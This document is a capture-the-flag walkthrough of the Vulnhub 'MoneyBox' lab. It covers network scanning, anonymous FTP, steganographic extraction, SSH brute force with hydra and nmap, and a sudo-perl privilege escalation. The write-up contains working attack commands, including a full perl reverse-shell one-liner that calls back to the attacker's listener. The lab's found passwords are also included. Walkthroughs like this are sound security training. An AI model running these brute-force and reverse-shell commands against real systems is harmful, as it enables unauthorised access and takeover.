Vulnhub MoneyBox

Penetration Test
,

[MONEYBOX]

Difficulty: [Medium→Easy]
Score: 5.5/10

Target

  1. 3 flags
  2. Root privilege

Process

1. Local Network Discovering

Subnet discover

sudo arp-scan -I eth0 -l

Port Scan

sudo nmap -p- 192.168.1.105

Port 21, 22, 5000 open

Identify Port Service

sudo nmap -p21,22,5000 -sV 192.168.1.105

Nmap common script Scan

sudo nmap -p21,22,80 -sC 192.168.1.105

We found that we can login ftp service with Anonymous

Login the ftp service download the image

2. Web Application Exploit

Web-path brute force enumeration

sudo dirsearch -u http://192.168.1.105


Check it out. There’s not useful information.

Ctrl+u Inspect the elements


found the special directory
Inspect elements under the S3cr3t-T3xt

3. Steganography

The image must be useful which we should know what information hide in it.

Extract the information from the picture

strings trytofind.jpg

steghide info trytofind.jpg
steghide extract -sf trytofind.jpg

Input the password we found 3xtr4ctd4t4

cat the data.txt

4. Brute Force SSH

Preparation dictionary

echo renu > user.txt
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz

What tools are most effective?
Here two tools I used:

Nmap

sudo nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.1.105

Hydra

hydra -l renu -P rockyou.txt 192.168.1.105 ssh

got the renu password: 987654321

5. Command and Control

Login user renu with ssh service

get the first flag of renu

Renu User History Collection

History

Oh damn! We found renu copy lily ssh private key.
That mean renu password is the same as lily.

2 ways to get lily flag

  1. Switch user
    The same password
su -u lily or ssh login
  1. Cat the lily flag directly
    Maybe the same password the same localgroup? Just try it.
cat /home/lily/user2.txt

  1. Oh that work!

Lily User information Collection

sudo -l


**Oh how lucky we are. We can use perl to make ****root privilege reverse shell**
local machine listening on port 5555

nc -lnvp 5555

Make the perl reverse shell

sudo perl -e 'use Socket;$i="{local machineIP}";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Cat the root flag

Summary

The hard and important part is found the door to get shell. Steganography is the newest part I ever had, i think the virtual machine is CTF style. Easy privilege escalation, If privilege escalation be more dificult, the total dificulty will be raised to a higher level, maybe Medium→High or just medium. It’s my first time to use perl reverse shell. Here is a ‘E’ parameter to contain the shellcode.